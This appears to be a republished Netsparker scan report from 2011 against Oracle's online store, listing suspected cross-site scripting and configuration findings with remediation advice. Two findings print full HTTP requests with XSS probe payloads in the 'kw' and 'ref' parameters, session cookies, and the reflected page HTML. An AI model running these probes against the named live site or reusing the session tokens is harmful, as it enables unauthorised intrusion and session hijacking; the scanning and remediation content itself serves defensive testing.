XSS, Phishing, Insecure Configuration, Cross Site Scripting, oraclestore.oracle.com SUMMARY

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading
Netsparker - DORK Report Summary
TARGET URL
 https://oraclestore.oracle.com/OA_HTML/ibeCCt...
DORK DATE
 9/11/2011 5:56:29 PM
REPORT DATE
 9/11/2011 6:33:56 PM
DORK DURATION
 00:24:48

Total Requests

Average Speed

req/sec.
29
identified
3
confirmed
0
critical
4
informational

DORK SETTINGS

DORK Settings
PROFILE
 Previous Settings
ENABLED ENGINES
 Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security DORKner
IMPORTANT
59 %
MEDIUM
14 %
LOW
14 %
INFORMATION
14 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/OA_HTML/ibeCCtdMinisites.jsp ref GET Cross-site Scripting No
Cookie Not Marked As Secure Yes
/OA_HTML/ibeCCtpBuyRoute.jsp qty POST Cross-site Scripting No
MS Office Information Disclosure No
uom POST Database Error Message No
[Possible] Internal Path Leakage (Windows) No
/OA_HTML/ibeCCtpItmDspRte.jsp kw GET Cross-site Scripting No
section GET [Possible] Cross-site Scripting No
/OA_HTML/ibeCCtpSctDspRte.jsp MS Office Information Disclosure No
section GET Redirect Response BODY Is Too Large Yes
[Possible] Internal Path Leakage (Windows) No
/OA_HTML/ibeCScdViewA.jsp kw GET Cross-site Scripting No
/OA_HTML/ibeCSrdSrchAdvForm.jsp kw GET Cross-site Scripting No
/OA_HTML/ibeCSrdSrchResults.jsp kw GET Cross-site Scripting No
kw GET Cross-site Scripting No
kw POST Cross-site Scripting No
/OA_HTML/ibeCZzdHelp.jsp kw GET Cross-site Scripting No
E-mail Address Disclosure No
/OA_HTML/ibeCZzpHome.jsp kw GET Cross-site Scripting No
/OA_HTML/jtfdload.jsp Cookie Not Marked As HttpOnly Yes
/OA_HTML/misibeCCtdItemDetail.jsp kw GET Cross-site Scripting No
section GET Cross-site Scripting No
section GET Cross-site Scripting No
kw GET Cross-site Scripting No
section GET [Possible] Cross-site Scripting No
section GET [Possible] Cross-site Scripting No
section GET [Possible] Cross-site Scripting No
/OA_HTML/misibeCScdViewA.jsp kw GET Cross-site Scripting No
/OA_HTML/misibeCScdViewA_LJE.jsp kw GET Cross-site Scripting No
Cross-site Scripting

Cross-site Scripting
16 TOTAL
IMPORTANT
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hi-jacking users' active session
  • Changing the look of the page within the victims browser.
  • Mounting a successful phishing attack.
  • Intercept data and perform man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

Classification

OWASP A2 PCI v1.2-6.5.1 PCI v2.0-6.5.7 CWE-79 CAPEC-19 WASC-08
- /OA_HTML/ibeCSrdSrchResults.jsp

/OA_HTML/ibeCSrdSrchResults.jsp

http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchResults.jsp?cg=3&kw=%22%3E%3Cnet%20sparker=alert(0x..

Parameters

Parameter Type Value
cg GET 3
kw GET "><net sparker=alert(0x00083A)>
ds GET 0
dr GET 50
st GET kw
cpg GET 0

Request

GET /OA_HTML/ibeCSrdSrchResults.jsp?cg=3&kw=%22%3E%3Cnet%20sparker=netsparker(0x00083A)%3E&ds=0&dr=50&st=kw&cpg=0 HTTP/1.1
Referer: https://oraclestore.oracle.com/OA_HTML/ibeCZzdHelp.jsp?GSI=xw7XzrhVDfQxPPTRIpSLNd3Y2y&GSI_pses=ZG58546D7CC88023DFCAD78C33D94F83ED7A0D70952D644BCC5157A841AAB5468E856736C9A89661BEAE2F1B15C4D323B5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: oraclestore.oracle.com
Cookie: JSESSIONID=7f96e59dfb8d0202586e8359774ee2fec06b8511a19aee1a07124bef3ce65a1c.e34QbhaLa3mKbi0La3mQaNePax4Oe0; GSI_pses=ZG1D9CEEDB828927CBD1E5216C2D4093F807700DABB77315AC15ED720230AEE331B4C130013EABF132E156012D52FD304D; BIGipServergsiap_store_http=3540882061.5150.0000; GSI=ovs25lr516P3O8HiRnvCRKlf6w
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Encoding:
Set-Cookie: JSESSIONID=7f96e59dfb8d0202586e8359774ee2fec06b8511a19aee1a07124bef3ce65a1c.e34Qb38Qax0Obi0La3mQaxaObxuNe0; path=/OA_HTML; secure
Content-Length: 5197
Date: Sun, 11 Sep 2011 17:57:51 GMT
































<!-- $Header: ibeCSrdSrchResults.jsp 120.16.12010000.3 2009/03/30 05:20:55 scnagara ship $ --><!-- $Header: ibeCZzpHeader.jsp 120.32.12010000.3 2009/03/03 06:43:46 ukalaiah ship $ --><!-- ibeCZzpHeader.jsp end --><!--fixed bug 3854430 -- browser title derived from fnd_message instead of hardcoding --><!-- $Header: ibeCZzdTop.jsp 120.2 2005/07/04 04:26:38 appldev ship $ --> <!-- $Header: ibwTrackingHeader.jsp 120.6 2006/01/22 21:55 schittar noship $ -->















<!-- $Header: ibeCCtdTop.jsp 120.7.12010000.6 2010/04/23 07:18:39 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><HTML lang="EN-US"><HEAD> <TITLE> Site:Search Results </TITLE> <link rel=stylesheet href=ibeCStyleSheet.css> <SCRIPT LANGUAGE="JavaScript" SRC="ibeCButton.js"></script> <script LANGUAGE="javascript"> var disableanchorlink= true; var hidedivmouseout= [true, 200]; var formNameSL="null"; var relatedIndex="null"; function getWinOffset(what, offsettype){ return (what.offsetParent)? what[offsettype]+this.getWinOffset(what.offsetParent, offsettype) : what[offsettype]; } function isPopUpExist(m, e){ var e=window.event || e var c=e.relatedTarget || ((e.type=="mouseover")? e.fromElement : e.toElement) while (c && c!=m)try {c=c.parentNode} catch(e){c=m} if (c==m) return true; else return false; } function showSLPopup(anchorobj, subobj, e){ try{ if(isItemPopupOpen()){ closeItemPopup(); } }catch(ex){} formNameSL = anchorobj.getAttribute("formname"); try{ relatedIndex = anchorobj.getAttribute("relindex"); }catch(ex){} try{ document.getElementById('text_cr_shoplist').value='Create Shopping List'; }catch(ex){} try{ document.getElementById('text_cr_shoplist_details').value='Create Shopping List'; }catch(ex){} if (!this.isPopUpExist(anchorobj, e) || (e && e.type=="click")){ var e=window.event || e; if (e.type=="click" && subobj.style.visibility=="visible"){ subobj.style.visibility="hidden"; return; } var subobjtemp; if(formNameSL == 'relatedForm'){ subobjtemp=document.getElementById('tempoffset_related'); } else { subobjtemp=document.getElementById('tempoffset'); } var horizontaloffset=(subobj.dropposition[0]=="left")? -(subobj.offsetWidth-anchorobj.offsetWidth) : 0; var verticaloffset=(subobj.dropposition[1]=="top")? -subobj.offsetHeight : anchorobj.offsetHeight ; subobj.style.left=this.getWinOffset(subobjtemp, "offsetLeft") + horizontaloffset + "px"; subobj.style.top=this.getWinOffset(anchorobj, "offsetTop")+verticaloffset+"px"; subobj.style.clip=(subobj.dropposition[1]=="top")? "rect(auto auto auto 0)" : "rect(0 auto 0 0)"; subobj.style.visibility="visible"; subobj.startTime=new Date().getTime(); subobj.contentheight=parseInt(subobj.offsetHeight); if (typeof window["hidetimer_"+subobj.id]!="undefined") clearTimeout(window["hidetimer_"+subobj.id]); this.slideengine(subobj, (subobj.dropposition[1]=="top")? "up" : "down"); } } function curveincrement(percent){ return (1-Math.cos(percent*Math.PI)) / 2 ; } function slideengine(obj, direction){ var elapsed=new Date().getTime()-obj.startTime; if (elapsed<obj.glidetime){ var distancepercent=(direction=="down")? this.curveincrement(elapsed/obj.glidetime) : 1-this.curveincrement(elapsed/obj.glidetime); var currentclip=(distancepercent*obj.contentheight)+"px"; obj.style.clip=(direction=="down")? "rect(0 auto "+currentclip+" 0)" : "rect("+currentclip+" auto auto 0)"; window["glidetimer_"+obj.id]=setTimeout(function(){slideengine(obj, direction)}, 10); } else{ obj.style.clip="rect(0 auto auto 0)"; } } function hide(activeobj, subobj, e){ if (!isPopUpExist(activeobj, e)){ window["hidetimer_"+subobj.id]=setTimeout(function(){ subobj.style.visibility="hidden" subobj.style.left=subobj.style.top=0 clearTimeout(window["glidetimer_"+subobj.id]) }, hidedivmouseout[1]) } } function initpopup(anchorid, pos, glidetime, revealbehavior){ var anchorobj=document.getElementById(anchorid); var subobj=document.getElementById(anchorobj.getAttribute('rel')); subobj.dropposition=pos.split("-"); subobj.glidetime=glidetime || 1000; subobj.style.left=subobj.style.top=0; if (typeof revealbehavior=='undefined' || revealbehavior=='mouseover'){ anchorobj.onmouseover=function(e){showSLPopup(this, subobj, e)} anchorobj.onmouseout=function(e){hide(subobj, subobj, e)} if (this.disableanchorlink) anchorobj.onclick=function(){return false} } else anchorobj.onclick=function(e){showSLPopup(this, subobj, e); return false} if (this.hidedivmouseout[0]==true) subobj.onmouseout=function(e){hide(this, subobj, e)} }</script> </HEAD><body class="applicationBody"><!-- ibeCCtdTop.jsp end --><!-- ibeCZzdTop.jsp end --><!-- $Header: ibeCZzdMenu.jsp 120.4 2005/09/16 11:44:37 appldev ship $ -->



























<!-- $Header: ibeCCtdMenu.jsp 120.32.12010000.7 2009/06/02 09:02:13 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><a href="#TheContent"><img src="/OA_MEDIA/jtfutrpx.gif" align=right width=1 height=1 alt="Skip navigation elements to page contents" border="0"></a><table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td class="topBG"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td colspan="2" height="10"><img src="/OA_MEDIA/jtfutrpx.gif" alt="" height="10"></td> </tr> <tr><!--- Commented the hardrcoded logo image bug 6794502 <td width="5%" valign="center"> <img src="/OA_MEDIA/FNDSSCORP.gif" alt="" border="0"/> </td>---><td width='5%' valign='center' ><a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=10021:22372:US"><img src="jtfdload.jsp?fileid=455388252&appName=IBE&sitex=10021:22372:US" ALT="Site Main Logo" border=0 ></a></td> <td width="95%" valign="bottom" class="applicationName"> &nbsp;&nbsp;United States </td> </tr> <tr> <td colspan="2" align="right"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=10021:22372:US" class=OraGlobalButtonText> Sites</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/misibeCScdViewA.jsp?sitex=10021:22372:US" class=OraGlobalButtonText> Cart</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCOtdOrdSumMain.jsp?sitex=10021:22372:US" class=OraGlobalButtonText> Orders</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpProfMenuHome.jsp?sitex=10021:22372:US" class=OraGlobalButtonText> Profile</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOLogin.jsp?sitex=10021:22372:US" class=OraGlobalButtonText> Login</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOReg.jsp?sitex=10021:22372:US" class=OraGlobalButtonText> Register</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdHelp.jsp?sitex=10021:22372:US" class=OraGlobalButtonText> Help</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> </tr> </table> </td> </tr> <tr> <td height="1" colspan="2" valign="bottom" align="left"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1"><img src="/OA_HTML/cabo/images/swan/topDimTabL.gif" alt="" border="0"/></td> <td nowrap class="OraTabBarEnabled"> <a class="OraTabBarEnabled" target=_parent href="http://oraclestore.oracle.com/OA_HTML/ibeCCtpSctDspRte.jsp?section=10380&sitex=10021:22372:US">Home</a> </td> <td width="1"><img src="/OA_HTML/cabo/images/swan/topDimTabR.gif" alt="" border="0"/></td> <td width="1"/> </tr> </table> </td> </tr> <tr> <td align="left" background="/OA_HTML/cabo/images/swan/header-Bg.gif" colspan="2"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8" height="5" /></td> </tr> </table> </td> </tr> </table> </td> </tr></table><form method="get" target=_parent name=searchItemaction="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchResults.jsp"><INPUT TYPE=hidden NAME="cg" value=""><INPUT TYPE=hidden NAME="kw" value=""><INPUT TYPE=hidden NAME="ds" value="0"><INPUT TYPE=hidden NAME="dr" value="50"><INPUT TYPE=hidden NAME="st" value="kw"><INPUT TYPE=hidden NAME="cpg" value="0"> <!-- PREFAB_REF=""--></form><script language="JavaScript"><!--function postSearchItem() { var serIt = document.searchItem; var selIndex = document.common.cg.selectedIndex; serIt.cg.value = document.common.cg.options[selIndex].value; serIt.kw.value = document.common.kw.value; serIt.submit();}//--></script><form name=common onSubmit="postSearchItem();return false;"><table summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody> <tr class="searchBar"> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> <td align="left" valign="middle" nowrap height="25"> <table summary="" border="0" cellspacing="0" cellpadding="0"> <tr> <td valign="middle" nowrap class=prompt> Quick Search </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="cg"><span class="jttinvis"> Quick Search&nbsp;&nbsp;</span></label> <select id="cg" name="cg" class="prompt"> <option value=-200 >All Products <option value=10380>Home </select> </td> <td class="prompt" align="right" nowrap> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="query"><span class="jttinvis"> Keyword(s):</span></label> <INPUT id="query" TYPE="text" size="30" NAME="kw" value=""><net sparker=netsparker(0x00083A)>"> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td> <script language="JavaScript"> buttonGen("Go","javascript:postSearchItem()"); </script> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td nowrap> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchAdvForm.jsp?sitex=10021:22372:US" target=_parent class="searchBarLink"> Advanced Search</a>&nbsp;<a class=searchBarLink target=_parent href="/OA_HTML/ibeCCtpSctDspRte.jsp?section=11365&media=os_g_english_help_search_tool">Help</a> </a> </td> </tr> </table> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> </tr></table></form><a id="TheContent" name="TheContent"></a><table class="contentBG" summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody><!-- 11/11/2008 amaheshw Bug 7502501 --><tr><td colspan=3><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></td></tr><tr><td><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=10></td><td width=100%><NOSCRIPT><table summary="" border=0 cellspacing=0 cellpadding=0> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=5><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=13></TD> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR> <TR> <TD>&nbsp;</TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=OraBGAccentDark> <img alt='' height=32 src="/OA_MEDIA/jtfuwarn.gif" width=32></TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=errorHeader>Error</TD> <TD class=errorMessage><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=20></TD> <TD class=errorMessage width="100%"> <LI>JavaScript is disabled on your browser. JavaScript needs to be turned on for the application to be fully functional. </TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD>&nbsp;</TD> </TR> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=7><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR></table></NOSCRIPT>










<!-- $Header: ibeCAcdProfMenuTop.jsp 120.0 2005/05/30 03:20:10 appldev noship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><!-- ibeCCtdMenu.jsp end --><!-- ibeCZzdMenu.jsp end --><table summary='' border=0 width="100%" cellspacing="0" cellpadding="1" > <tr> <td valign="top" width="15%" >&nbsp;</td> <td valign="top" width="70%" class="pageTitle"> <!-------------------- bug 7559727 use error message box--------------------> <table width="100%" border="0" cellspacing="0" cellpadding="4" summary=""> <TR> <TD> </TD> </TR> </table> <!-------------------- end bug 7559727 --------------------> <!--- bug 7559727 ..
- /OA_HTML/ibeCCtdMinisites.jsp

/OA_HTML/ibeCCtdMinisites.jsp

https://oraclestore.oracle.com/OA_HTML/ibeCCtdMinisites.jsp?language=US&ref=%27%22%20ns=%20alert(0x0..

Parameters

Parameter Type Value
language GET US
ref GET '" ns= alert(0x0005AD)

Request

GET /OA_HTML/ibeCCtdMinisites.jsp?language=US&ref=%27%22+ns%3D+netsparker%280x0005AD%29+ HTTP/1.1
Referer: https://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?ref=http://oraclestore.oracle.com/OA_HTML/ibeCZzpHome.jsp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: oraclestore.oracle.com
Cookie: JSESSIONID=7a35c7e2eee5794721729186d7d44bf1fb9b4f0512eaf379378489f55e44618c.e34Qb38Qax0Obi0La3mQaxaObxuOe0; GSI_pses=ZG988B3B7EC5FADB4F250758AE002243C72E5B6609D5CF1357EACB93A384F26E84902DAF5B22ED92CD8EEA1128D796C371; BIGipServergsiap_store_http=1510838925.5150.0000; GSI=23dIUvp8S9HUo63KUrLDyEBTB3
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Encoding:
Set-Cookie: JSESSIONID=7a35c7e2eee5794721729186d7d44bf1fb9b4f0512eaf379378489f55e44618c.e34Qb38Qax0Obi0La3mQaxaObxuOe0; path=/OA_HTML; secure
Content-Length: 5715
Date: Sun, 11 Sep 2011 17:57:25 GMT
































<!-- $Header: ibeCCtdMinisites.jsp 120.12.12010000.5 2010/02/15 11:20:58 amaheshw ship $ --><!-- $Header: ibeCZzpHeader.jsp 120.32.12010000.3 2009/03/03 06:43:46 ukalaiah ship $ --><!-- ibeCZzpHeader.jsp end --><!-- $Header: ibeCZzdTop.jsp 120.2 2005/07/04 04:26:38 appldev ship $ --> <!-- $Header: ibwTrackingHeader.jsp 120.6 2006/01/22 21:55 schittar noship $ -->















<!-- $Header: ibeCCtdTop.jsp 120.7.12010000.6 2010/04/23 07:18:39 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><HTML lang="EN-US"><HEAD> <TITLE> Site:Specialty Sites </TITLE> <link rel=stylesheet href=ibeCStyleSheet.css> <SCRIPT LANGUAGE="JavaScript" SRC="ibeCButton.js"></script> <script LANGUAGE="javascript"> var disableanchorlink= true; var hidedivmouseout= [true, 200]; var formNameSL="null"; var relatedIndex="null"; function getWinOffset(what, offsettype){ return (what.offsetParent)? what[offsettype]+this.getWinOffset(what.offsetParent, offsettype) : what[offsettype]; } function isPopUpExist(m, e){ var e=window.event || e var c=e.relatedTarget || ((e.type=="mouseover")? e.fromElement : e.toElement) while (c && c!=m)try {c=c.parentNode} catch(e){c=m} if (c==m) return true; else return false; } function showSLPopup(anchorobj, subobj, e){ try{ if(isItemPopupOpen()){ closeItemPopup(); } }catch(ex){} formNameSL = anchorobj.getAttribute("formname"); try{ relatedIndex = anchorobj.getAttribute("relindex"); }catch(ex){} try{ document.getElementById('text_cr_shoplist').value='Create Shopping List'; }catch(ex){} try{ document.getElementById('text_cr_shoplist_details').value='Create Shopping List'; }catch(ex){} if (!this.isPopUpExist(anchorobj, e) || (e && e.type=="click")){ var e=window.event || e; if (e.type=="click" && subobj.style.visibility=="visible"){ subobj.style.visibility="hidden"; return; } var subobjtemp; if(formNameSL == 'relatedForm'){ subobjtemp=document.getElementById('tempoffset_related'); } else { subobjtemp=document.getElementById('tempoffset'); } var horizontaloffset=(subobj.dropposition[0]=="left")? -(subobj.offsetWidth-anchorobj.offsetWidth) : 0; var verticaloffset=(subobj.dropposition[1]=="top")? -subobj.offsetHeight : anchorobj.offsetHeight ; subobj.style.left=this.getWinOffset(subobjtemp, "offsetLeft") + horizontaloffset + "px"; subobj.style.top=this.getWinOffset(anchorobj, "offsetTop")+verticaloffset+"px"; subobj.style.clip=(subobj.dropposition[1]=="top")? "rect(auto auto auto 0)" : "rect(0 auto 0 0)"; subobj.style.visibility="visible"; subobj.startTime=new Date().getTime(); subobj.contentheight=parseInt(subobj.offsetHeight); if (typeof window["hidetimer_"+subobj.id]!="undefined") clearTimeout(window["hidetimer_"+subobj.id]); this.slideengine(subobj, (subobj.dropposition[1]=="top")? "up" : "down"); } } function curveincrement(percent){ return (1-Math.cos(percent*Math.PI)) / 2 ; } function slideengine(obj, direction){ var elapsed=new Date().getTime()-obj.startTime; if (elapsed<obj.glidetime){ var distancepercent=(direction=="down")? this.curveincrement(elapsed/obj.glidetime) : 1-this.curveincrement(elapsed/obj.glidetime); var currentclip=(distancepercent*obj.contentheight)+"px"; obj.style.clip=(direction=="down")? "rect(0 auto "+currentclip+" 0)" : "rect("+currentclip+" auto auto 0)"; window["glidetimer_"+obj.id]=setTimeout(function(){slideengine(obj, direction)}, 10); } else{ obj.style.clip="rect(0 auto auto 0)"; } } function hide(activeobj, subobj, e){ if (!isPopUpExist(activeobj, e)){ window["hidetimer_"+subobj.id]=setTimeout(function(){ subobj.style.visibility="hidden" subobj.style.left=subobj.style.top=0 clearTimeout(window["glidetimer_"+subobj.id]) }, hidedivmouseout[1]) } } function initpopup(anchorid, pos, glidetime, revealbehavior){ var anchorobj=document.getElementById(anchorid); var subobj=document.getElementById(anchorobj.getAttribute('rel')); subobj.dropposition=pos.split("-"); subobj.glidetime=glidetime || 1000; subobj.style.left=subobj.style.top=0; if (typeof revealbehavior=='undefined' || revealbehavior=='mouseover'){ anchorobj.onmouseover=function(e){showSLPopup(this, subobj, e)} anchorobj.onmouseout=function(e){hide(subobj, subobj, e)} if (this.disableanchorlink) anchorobj.onclick=function(){return false} } else anchorobj.onclick=function(e){showSLPopup(this, subobj, e); return false} if (this.hidedivmouseout[0]==true) subobj.onmouseout=function(e){hide(this, subobj, e)} }</script> </HEAD><body class="applicationBody"><!-- ibeCCtdTop.jsp end --><!-- ibeCZzdTop.jsp end --><!-- $Header: ibeCZzdMenu.jsp 120.4 2005/09/16 11:44:37 appldev ship $ -->



























<!-- $Header: ibeCCtdMenu.jsp 120.32.12010000.7 2009/06/02 09:02:13 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><a href="#TheContent"><img src="/OA_MEDIA/jtfutrpx.gif" align=right width=1 height=1 alt="Skip navigation elements to page contents" border="0"></a><table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td class="topBG"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td colspan="2" height="10"><img src="/OA_MEDIA/jtfutrpx.gif" alt="" height="10"></td> </tr> <tr><!--- Commented the hardrcoded logo image bug 6794502 <td width="5%" valign="center"> <img src="/OA_MEDIA/FNDSSCORP.gif" alt="" border="0"/> </td>---><td width='5%' valign='center' ><a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?a=b"><img src="jtfdload.jsp?fileid=455388252&appName=IBE" ALT="Site Main Logo" border=0 ></a></td> <td width="95%" valign="bottom" class="applicationName"> &nbsp;&nbsp; </td> </tr> <tr> <td colspan="2" align="right"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?a=b" class=OraGlobalButtonTextSelected> Sites</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOLogin.jsp?a=b" class=OraGlobalButtonText> Login</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOReg.jsp?a=b" class=OraGlobalButtonText> Register</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdHelp.jsp?a=b" class=OraGlobalButtonText> Help</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> </tr> </table> </td> </tr> </table> </td> </tr></table><table summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody><tr><td><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></td></tr><tr><td><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=10></td><td width=100%><a id="TheContent" name="TheContent"></a><table class="contentBG" summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody><!-- 11/11/2008 amaheshw Bug 7502501 --><tr><td colspan=3><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></td></tr><tr><td><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=10></td><td width=100%><NOSCRIPT><table summary="" border=0 cellspacing=0 cellpadding=0> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=5><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=13></TD> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR> <TR> <TD>&nbsp;</TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=OraBGAccentDark> <img alt='' height=32 src="/OA_MEDIA/jtfuwarn.gif" width=32></TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=errorHeader>Error</TD> <TD class=errorMessage><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=20></TD> <TD class=errorMessage width="100%"> <LI>JavaScript is disabled on your browser. JavaScript needs to be turned on for the application to be fully functional. </TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD>&nbsp;</TD> </TR> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=7><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR></table></NOSCRIPT>










